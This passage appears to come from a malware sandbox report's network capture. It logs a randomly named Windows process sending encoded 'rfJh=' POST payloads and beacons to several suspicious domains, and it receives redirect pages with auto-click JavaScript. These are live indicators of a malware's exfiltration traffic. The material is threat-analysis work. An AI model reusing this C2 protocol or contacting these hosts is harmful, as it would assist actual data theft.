                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/36be/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 43 53 2b 65 55 33 71 75 37 30 4a 38 52 59 62 67 59 39 53 57 49 38 72 73 36 55 36 68 73 2b 43 43 79 30 30 45 53 61 49 42 7a 73 55 6b 75 57 53 53 57 45 64 43 41 50 2b 36 61 58 34 42 76 58 67 65 5a 56 38 6d 41 58 74 48 44 55 34 77 43 43 65 4e 78 54 53 61 4c 63 56 4b 55 35 38 77 62 4c 67 65 55 46 35 67 30 77 6f 58 65 65 4e 76 72 73 73 69 61 2b 68 70 72 42 77 77 42 74 53 47 36 54 4c 4a 6c 71 78 39 6a 5a 70 64 4e 4b 61 47 79 51 6c 36 54 4e 2f 58 4e 73 54 48 61 2b 6a 4e 43 44 42 52 47 6d 6c [TRUNCATED]
                                                      Data Ascii: rfJh=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBnGKboR31WcL8Z1djdB9is72GPKo8uFb8Cmq+F2JQMA+vgVGt/jUYSyY6Oj4iaXpNdp6UNoFNqSnJX3Tg2ftoxqyqSAg5ynmtjyxD+Phjh+MFMmqGGrGCHdGL2UWtJ4Ep6CS+eU3qu70J8RYbgY9SWI8rs6U6hs+CCy00ESaIBzsUkuWSSWEdCAP+6aX4BvXgeZV8mAXtHDU4wCCeNxTSaLcVKU58wbLgeUF5g0woXeeNvrssia+hprBwwBtSG6TLJlqx9jZpdNKaGyQl6TN/XNsTHa+jNCDBRGmlNFg7cU0zE6HAMurjPJdayxAgy62M88Btbo4gU8lagGGzzv/O/hx964/qWY/gMy1R+XZQhdnf8rAzaKHJsGJfap2mEPUaDZFI6SHY5mmRyL60sSCts9AWyaiN5jRFeKZl58/rdUKCcAO8h7lIC7QVp6i1zwWgjCZY/8qWAzO+fSzOZGXM0UjoW5m5Yqf7+57k8u+PetCvgHv9DMQMoDQPVh78d8YKCPfxkWCsHf3Y7jrys1bgHQuWhWHCw1bWNq47/lVy+tjNpDSEn3TaZx+TaPdN4YpmRKuWBcTlgpkfpJlYyOvv3vHfDKeFeZsBRWNDbrJCVVD6lmvl4gfJ15bVj3Ro86myi25z//46xEi5cKj38X9yac0PmaBiZcByNCy8OPhdR+GDEIlUFyHFyPweUi1RBaUjACjNBccHqmVgHSwg1CvvkCPW7EkAf8wBkzrxwVQaGEusnj3m8XkbPrX1Co8xmrV6p1z9gy7Pt2laZx6Jqf6qFKa9C7POxF6CD9vLN4G7Wpy4a3deI+fCDTElu5H+6bfQgZ/aVoT43l6RlYuf2cb4xBDa6oRGVDDvlBSrTkhzGuHt8d4KGX4vudBiL/uWrmAj+b5C71vaDGeUxEHAbImwiGGgjOc1U09xT0ck+9Tc0g3YWpFsEkenYK67hILtEP4osZKyyA [TRUNCATED]
                                                       Dec 3, 2024 06:55:51.881123066 CET | 532 | IN | HTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 357
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       24 | 192.168.2.4 | 49937 | 23.225.159.42 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:55:53.350812912 CET | 363 | OUT | GET /36be/?O258-=pHdHBdXhwLO&rfJh=zT+fCPSXWqCfWPgPkoP8augIhoSODsGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rERMucz0ZFCszNnC27qzdt1he7kDJbjieX8= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.laohub10.net
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                       Dec 3, 2024 06:55:54.586163044 CET | 532 | IN | HTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 357
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       25 | 192.168.2.4 | 49953 | 172.67.187.114 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:00.190475941 CET | 629 | OUT | POST /kf1m/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.zkdamdjj.shop
                                                      Origin: http://www.zkdamdjj.shop
                                                      Referer: http://www.zkdamdjj.shop/kf1m/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 4a 31 63 58 48 65 4e 38 6e 34 79 33 37 51 49 45 50 47 61 42 49 46 48 4c 5a 73 31 35 67 62 67 73 4c 34 74 56 47 5a 4d 30 4c 7a 58 31 48 71 66 70 38 6e 31 66 52 64 52 59 42 4f 7a 39 41 33 4e 44 2f 70 5a 32 6b 30 4a 66 49 53 58 66 63 42 49 71 67 34 5a 74 2b 32 6c 4f 6a 54 6c 4a 4a 4c 77 49 4e 38 63 77 31 33 52 75 73 39 36 51 76 70 2f 7a 35 48 67 42 4b 6a 2b 67 63 36 6a 6f 4f 6e 67 4a 79 63 63 66 61 42 75 43 49 34 53 63 57 43 51 30 36 75 53 36 51 33 37 38 53 61 65 55 39 6f 4d 6b 64 31 69 33 4f 70 71 6f 74 6c 64 36 39 36 4c 62 7a 6e 46 52 51 3d 3d
                                                      Data Ascii: rfJh=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6Q378SaeU9oMkd1i3Opqotld696LbznFRQ==


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       26 | 192.168.2.4 | 49959 | 172.67.187.114 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:02.857264042 CET | 649 | OUT | POST /kf1m/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.zkdamdjj.shop
                                                      Origin: http://www.zkdamdjj.shop
                                                      Referer: http://www.zkdamdjj.shop/kf1m/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 2f 67 74 75 63 74 57 45 78 4d 33 4c 7a 58 2b 6e 72 30 30 73 6e 69 66 52 5a 6a 59 44 71 7a 39 45 6e 4e 44 2b 5a 5a 78 58 4d 49 65 59 53 56 58 38 42 4f 6b 41 34 5a 74 2b 32 6c 4f 6a 75 4f 4a 4a 54 77 49 5a 41 63 68 6b 33 57 74 73 39 6c 56 76 70 2f 33 35 48 6b 42 4b 69 72 67 64 57 64 6f 4d 76 67 4a 32 4d 63 65 4f 31 74 52 6f 34 51 44 47 44 62 35 4a 72 34 69 53 6d 58 6a 7a 58 39 52 2f 77 31 68 62 34 34 6d 2f 49 39 36 74 42 75 6e 36 7a 2f 57 77 61 4d 4b 58 41 44 42 49 43 44 51 30 6f 39 34 34 48 54 38 66 41 48 58 46 34 3d
                                                      Data Ascii: rfJh=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tBun6z/WwaMKXADBICDQ0o944HT8fAHXF4=


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       27 | 192.168.2.4 | 49966 | 172.67.187.114 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:05.511126041 CET | 10731 | OUT | POST /kf1m/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.zkdamdjj.shop
                                                      Origin: http://www.zkdamdjj.shop
                                                      Referer: http://www.zkdamdjj.shop/kf1m/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 33 67 74 59 51 74 55 6c 78 4d 32 4c 7a 58 33 48 71 54 30 73 6d 67 66 52 67 71 59 44 57 4a 39 43 37 4e 43 63 52 5a 77 6d 4d 49 55 59 53 56 49 73 42 4c 71 67 35 45 74 2b 6e 73 4f 69 43 4f 4a 4a 54 77 49 66 6b 63 68 31 33 57 72 73 39 36 51 76 70 4a 7a 35 48 41 42 4b 37 63 67 64 6a 6d 30 76 58 67 4b 57 63 63 63 39 64 74 4c 6f 34 57 43 47 43 62 35 4f 6a 6a 69 53 71 74 6a 79 53 53 52 39 73 31 73 66 31 66 39 64 67 6d 70 62 74 66 31 4c 48 55 56 77 53 78 47 6b 38 6c 48 4b 50 62 45 51 67 47 35 50 57 55 6c 4d 41 55 4d 52 63 45 71 42 74 76 56 53 46 48 7a 69 6f 64 53 52 69 56 4a 71 6c 31 34 4f 50 4b 6c 76 78 66 64 63 70 4b 6d 78 63 4e 37 31 75 59 7a 46 64 49 4a 30 66 72 77 31 58 2f 4a 66 32 44 35 38 59 6e 4a 70 33 6f 34 39 61 41 79 6d 77 39 47 55 4e 2b 57 46 48 6a 7a 34 57 4c 45 59 54 45 4b 6c 71 53 30 7a 56 48 70 59 70 31 37 6a 69 64 53 68 78 69 35 43 67 73 42 4c 74 41 68 [TRUNCATED]
                                                       Data Ascii: rfJh= [TRUNCATED]


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       28 | 192.168.2.4 | 49971 | 172.67.187.114 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:08.170773983 CET | 364 | OUT | GET /kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.zkdamdjj.shop
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                       Dec 3, 2024 06:56:10.202681065 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Tue, 03 Dec 2024 05:56:10 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      x-redirect-by: WordPress
                                                      location: https://zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO
                                                      x-litespeed-cache-control: public,max-age=3600
                                                      x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.fe2f0d048587da8ccb778a9020edc358,02a_
                                                      x-litespeed-cache: miss
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QztMNiTPONMg4StmNIegGpscxYCZkcm4p9tnRCOzKjWMpT9%2Bto11pLxhA5Wr8yjNJfe1QMy06FeAa9wh11Hob%2Bt%2FI1P4bxF47gn65qUeNMW5%2BkiNRUqG1Od%2FTLfggiJMyI50%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8ec14fd5584c4401-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1545&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=364&delivery_rate=0&cwnd=229&unsent_b
                                                      Data Raw:
                                                      Data Ascii:
                                                       Dec 3, 2024 06:56:10.202702999 CET | 45 | IN | Data Raw: 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: tes=0&cid=0000000000000000&ts=0&x=0"0


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       29 | 192.168.2.4 | 49989 | 13.248.169.48 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:15.984447002 CET | 614 | OUT | POST /k1td/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.tals.xyz
                                                      Origin: http://www.tals.xyz
                                                      Referer: http://www.tals.xyz/k1td/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 66 33 7a 66 57 4c 65 6c 71 64 4e 43 48 32 4f 54 6c 51 64 33 58 46 74 32 41 7a 4a 50 30 52 50 65 67 6f 66 66 6b 4f 53 47 33 5a 56 73 52 73 54 67 6b 50 37 63 58 63 62 49 6c 71 6f 48 49 76 50 77 69 4b 77 65 59 55 45 52 58 6c 62 33 64 67 74 6f 4a 54 36 4e 46 45 58 59 48 67 6f 41 59 64 73 4d 38 39 32 70 48 58 61 78 48 65 66 54 73 30 47 4b 34 56 32 67 78 59 53 30 4e 42 6c 61 61 44 44 45 72 6a 6f 6d 68 33 59 58 6a 41 55 31 6b 36 6b 59 4b 4e 72 71 4a 63 74 55 65 64 63 2b 52 72 6c 4c 42 58 47 31 34 4e 6a 67 69 2f 61 36 4b 4d 39 55 57 55 44 6f 49 67 3d 3d
                                                      Data Ascii: rfJh=lGkRzIOh6zQ2f3zfWLelqdNCH2OTlQd3XFt2AzJP0RPegoffkOSG3ZVsRsTgkP7cXcbIlqoHIvPwiKweYUERXlb3dgtoJT6NFEXYHgoAYdsM892pHXaxHefTs0GK4V2gxYS0NBlaaDDErjomh3YXjAU1k6kYKNrqJctUedc+RrlLBXG14Njgi/a6KM9UWUDoIg==


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       30 | 192.168.2.4 | 49997 | 13.248.169.48 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:18.655059099 CET | 634 | OUT | POST /k1td/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.tals.xyz
                                                      Origin: http://www.tals.xyz
                                                      Referer: http://www.tals.xyz/k1td/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 51 31 6e 66 47 63 4b 6c 2f 4e 4e 42 49 57 4f 54 2b 41 64 7a 58 46 68 32 41 79 4e 66 30 6a 37 65 68 4b 58 66 6c 50 53 47 77 5a 56 73 45 63 53 6b 71 76 37 74 58 63 58 71 6c 71 55 48 49 75 76 77 69 50 4d 65 59 6b 34 57 59 56 62 69 44 41 74 75 58 6a 36 4e 46 45 58 59 48 6a 56 64 59 64 30 4d 38 4e 6d 70 48 32 61 77 5a 75 66 63 76 30 47 4b 75 6c 32 6b 78 59 53 7a 4e 41 70 77 61 42 4c 45 72 6e 73 6d 67 6a 45 57 32 77 55 4a 36 4b 6c 34 44 34 4f 34 4f 75 30 41 56 50 30 71 51 35 78 33 4a 78 4c 76 70 38 43 33 77 2f 2b 4a 58 4c 30 67 62 58 2b 68 54 6e 54 6b 33 4a 65 63 52 64 68 4a 59 2f 4a 55 50 2b 69 53 6d 2f 49 3d
                                                      Data Ascii: rfJh=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0j7ehKXflPSGwZVsEcSkqv7tXcXqlqUHIuvwiPMeYk4WYVbiDAtuXj6NFEXYHjVdYd0M8NmpH2awZufcv0GKul2kxYSzNApwaBLErnsmgjEW2wUJ6Kl4D4O4Ou0AVP0qQ5x3JxLvp8C3w/+JXL0gbX+hTnTk3JecRdhJY/JUP+iSm/I=


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       31 | 192.168.2.4 | 50004 | 13.248.169.48 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:21.325094938 CET | 10716 | OUT | POST /k1td/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.tals.xyz
                                                      Origin: http://www.tals.xyz
                                                      Referer: http://www.tals.xyz/k1td/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 51 31 6e 66 47 63 4b 6c 2f 4e 4e 42 49 57 4f 54 2b 41 64 7a 58 46 68 32 41 79 4e 66 30 6a 6a 65 68 2f 62 66 6b 73 71 47 78 5a 56 73 46 63 53 70 71 76 37 4b 58 63 66 75 6c 71 5a 36 49 72 72 77 6a 70 34 65 54 33 67 57 50 46 62 69 4c 67 74 72 4a 54 37 51 46 45 48 63 48 67 74 64 59 64 30 4d 38 4c 4b 70 4f 48 61 77 62 75 66 54 73 30 47 65 34 56 32 63 78 59 4b 38 4e 41 74 4b 61 79 7a 45 71 48 38 6d 69 51 73 57 30 51 55 78 37 4b 6c 61 44 34 4c 6d 4f 75 6f 4d 56 4b 67 41 51 37 74 33 4b 51 2b 77 36 73 47 42 6d 75 69 36 4d 4a 67 39 66 6b 4f 39 52 48 58 42 35 71 6d 6b 50 66 70 6d 62 64 63 34 4c 76 6d 31 37 70 50 2b 4b 2b 73 58 36 73 75 41 34 37 6a 70 67 70 73 77 54 48 4b 72 49 6c 75 2b 69 64 63 32 53 76 6e 7a 65 4c 70 54 2f 4e 38 58 48 78 67 50 50 75 38 7a 54 73 4a 46 46 69 51 30 6f 71 4b 43 6a 31 39 71 49 4e 53 32 6d 79 42 59 79 56 4e 49 58 44 78 4b 45 4c 42 65 72 70 75 30 68 68 62 79 50 2b 31 72 7a 72 78 38 61 4e 79 4a 78 79 6c 53 53 59 2b 4f 79 65 44 35 6f [TRUNCATED]
                                                      Data Ascii: rfJh=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 [TRUNCATED]


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       32 | 192.168.2.4 | 50011 | 13.248.169.48 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:23.976130962 CET | 359 | OUT | GET /k1td/?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.tals.xyz
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                       Dec 3, 2024 06:56:25.157572985 CET | 398 | IN | HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Tue, 03 Dec 2024 05:56:24 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 66 4a 68 3d 6f 45 4d 78 77 2b 61 62 38 51 6c 45 5a 6d 54 6c 44 62 43 4b 70 74 73 6b 4e 30 71 39 2b 77 4d 48 51 48 4e 70 62 6b 42 4d 78 43 6a 44 72 37 48 6c 6f 64 6e 5a 67 66 46 73 51 4b 47 4b 6b 76 7a 2f 58 59 7a 70 76 50 4d 59 65 70 33 2b 73 5a 73 59 59 48 63 43 54 42 61 49 46 6a 52 61 44 30 57 71 64 58 44 48 5a 30 42 51 49 35 6b 47 38 73 4f 6e 50 31 75 32 52 4a 49 3d 26 4f 32 35 38 2d 3d 70 48 64 48 42 64 58 68 77 4c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO"}</script></head></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
